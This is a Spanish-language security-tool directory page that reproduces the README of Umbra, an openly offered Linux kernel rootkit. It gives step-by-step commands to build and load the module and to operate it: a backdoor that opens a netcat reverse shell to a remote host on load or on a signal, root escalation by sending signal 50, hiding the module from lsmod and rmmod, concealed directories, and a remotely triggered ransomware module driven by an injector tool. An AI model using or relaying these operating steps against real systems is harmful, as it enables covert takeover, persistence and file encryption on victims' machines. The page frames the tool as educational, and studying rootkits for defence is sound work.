Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Umbra — Un rootkit LKM dirigido a versiones de kernel 4.x y 5.x que abre una puerta trasera capaz de lanzar una shell inversa a un host remoto, ejecutar malware y más. | Kitploit
Herramientas/GitHubGitHub/h3xduck/umbra
Escalada de PrivilegiosHerramientas de Cifrado/DescifradoMecanismos de PersistenciaEvasión de IDS/IPSPost-ExplotaciónComando y ControlAprendizaje y EducaciónDesarrollo de PayloadsTroyano de Acceso Remoto
GitHubh3xduck/umbra

Umbra

Un rootkit LKM dirigido a versiones de kernel 4.x y 5.x que abre una puerta trasera capaz de lanzar una shell inversa a un host remoto, ejecutar malware y más.

13627hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra es un rootkit LKM experimental controlable de forma remota para kernels 4.x y 5.x (hasta 5.7) que abre una puerta trasera de red capaz de lanzar shells inversas a hosts remotos, ejecutar malware de forma remota y mucho más.

El rootkit sigue en desarrollo, aunque las características enumeradas a continuación ya son totalmente operativas.

Puerta trasera en acción

Nota: Este rootkit ha sido desarrollado y probado con el kernel 5.4.0 y Ubuntu 18.04.

Características

  • 🌟 Puerta trasera que lanza una shell inversa a una IP remota tras recibir un paquete TCP malicioso.
  • 🌟 Usa el Umbra Injector para controlar el rootkit de forma remota:
    • Shell inversa remota.
    • Ocultar/mostrar el rootkit de forma remota.
    • Ejecutar módulos de Umbra.
  • NUEVO: Se han añadido los módulos de Umbra, módulos especiales similares a malware que mejoran Umbra y pueden lanzarse de forma remota mediante el Umbra Injector.
  • NUEVO: Módulo de Umbra "Ransom" que convierte a Umbra en un ransomware controlable de forma remota.

Módulo Ransom en acción

  • Umbra oculta todos sus archivos y directorios de comandos de usuario como ls.
  • Umbra puede ocultarse/mostrarse de forma remota y local mediante señales.
  • Escalada de privilegios enviando la señal 50.
  • Lanza una shell inversa de netcat al cargar el módulo.
  • Lanza una shell inversa de netcat a un host remoto enviando la señal 51.

Más funcionalidades llegarán en futuras actualizaciones.

Aviso legal

Este rootkit es puramente con fines educativos. No soy responsable de ningún daño derivado de su uso indebido.

Ten también en cuenta que Umbra solo incorpora mecanismos ligeros de ocultación y protección. No está pensado para usarse en un escenario real.

IMPORTANTE: Si vas a probar este rootkit en tu propia máquina, recomiendo encarecidamente usar una VM.

Acerca de los módulos de Umbra: El módulo ransom usa un mecanismo de cifrado trivial, pero puede y ciertamente cifrará cualquier carpeta de tu máquina. Aunque los archivos pueden descifrarse fácilmente, definitivamente no recomiendo ejecutarlo contra tu carpeta raíz o similar salvo en un entorno controlado.

Tabla de contenidos

  1. Compilación e instalación
  2. Descargar Umbra
  3. Uso básico: control local
  4. Umbra Injector: Control remoto
  5. Módulos de Umbra
    • (NUEVO) Ransom
  6. Referencias

Compilación e instalación

Recuerda que debes tener disponible un kernel 4.x o 5.x.

  1. Descarga los archivos de cabecera de tu kernel
root@kitploit:~
apt install linux-headers-$(uname -r)
  1. Configura tu ruta de inclusión para cubrir el directorio de cabeceras del kernel (normalmente en /usr/src). Si usas vscode, puedes consultar .vscode/c_cpp_properties.json para ver un ejemplo de qué directorios incluir.

  2. Clona el proyecto

root@kitploit:~
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Compila Umbra
root@kitploit:~
make
  1. Carga Umbra en el kernel y configura el entorno El script instalará Umbra en el kernel y configurará un directorio especial donde almacenar los módulos de malware. El directorio será ocultado posteriormente por el rootkit.
root@kitploit:~
sudo ./install.sh

Si ya has ejecutado el script anteriormente y solo deseas instalar Umbra en el kernel, puedes ejecutar:

root@kitploit:~
sudo insmod ./umbra.ko

Descargar Umbra

Asegúrate de que Umbra no esté en modo invisible; de lo contrario, esto fallará.

root@kitploit:~
sudo rmmod umbra

Uso básico: control local

Cambiar los privilegios del usuario actual a root

  • Envía la señal 50 a cualquier PID.
root@kitploit:~
kill -50 1

Iniciar shell inversa de netcat hacia IP:PORT

  • Establece tu IP y puerto deseados en CONFIG.H antes de compilar el rootkit. Por defecto, 127.0.0.1:5888

  • Comienza a escuchar en el host remoto.

root@kitploit:~
nc -lvp 5888
  • Envía la señal 51 a cualquier PID. Umbra la capturará e iniciará la shell.
root@kitploit:~
kill -51 1

Nota: Umbra también intenta iniciar la shell inversa al cargarse.

Ocultar el rootkit - Modo invisible

Esto evitará que el rootkit sea mostrado por comandos como lsmod o que sea eliminado mediante rmmod.

root@kitploit:~
kill -52 1

Mostrar el rootkit

Esto revierte el modo invisible si está activo.

root@kitploit:~
kill -53 1

Umbra Injector: Control remoto

Obtener una shell inversa a través de la puerta trasera

El Umbra Injector puede ejecutarse tanto antes de que Umbra esté instalado (obteniendo así la shell una vez que esté activo) como después de que Umbra esté instalado en el sistema objetivo.

root@kitploit:~
./injector -S 127.0.0.1

La puerta trasera escucha paquetes con el siguiente payload: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

También puedes crear tu propio inyector usando mi librería RawTCP.

Ocultar el rootkit de forma remota - Modo invisible

Esto evitará que el rootkit sea mostrado por comandos como lsmod o que sea eliminado mediante rmmod.

root@kitploit:~
./injector -i 127.0.0.1

Mostrar el rootkit de forma remota

Esto revierte el modo invisible si está activo.

root@kitploit:~
./injector -u 127.0.0.1

Ayuda

Puedes ver toda la información sobre cómo ejecutar el Umbra Injector mediante:

root@kitploit:~
./injector -h

Módulos de Umbra

Los módulos de Umbra serán almacenados por el script install.sh en /tmp/umbra, donde Umbra los ocultará. El directorio no será visible para comandos como ls o similares.

Módulo Ransom

Este módulo puede lanzar ataques remotos similares a ransomware mediante el Umbra Injector. Los archivos cifrados aparecen con la extensión .ubr.

Actualmente el mecanismo de cifrado es un simple NOP a nivel de bits, como prueba de concepto. Puedes editar el módulo para incluir tu propio algoritmo de cifrado.

Cifrar un directorio y todos sus subdirectorios

root@kitploit:~
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

Descifrar un directorio y todos sus subdirectorios

root@kitploit:~
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

Referencias

El desarrollo de este rootkit implicó una cantidad sustancial de investigación sobre LKMs y técnicas de rootkits. La siguiente es una lista incompleta de los recursos que utilicé: Cómo crear LKMs:

  • https://sysprog21.github.io/lkmpg/

Referencia de syscalls de Linux:

  • https://syscalls64.paolostivanin.com/

Algunas referencias sobre rootkits:

  • https://xcellerator.github.io/posts/
  • https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
  • https://github.com/f0rb1dd3n/Reptile

Licencia

Este proyecto está licenciado bajo la licencia GPLv2. Consulta LICENSE

Descargar herramienta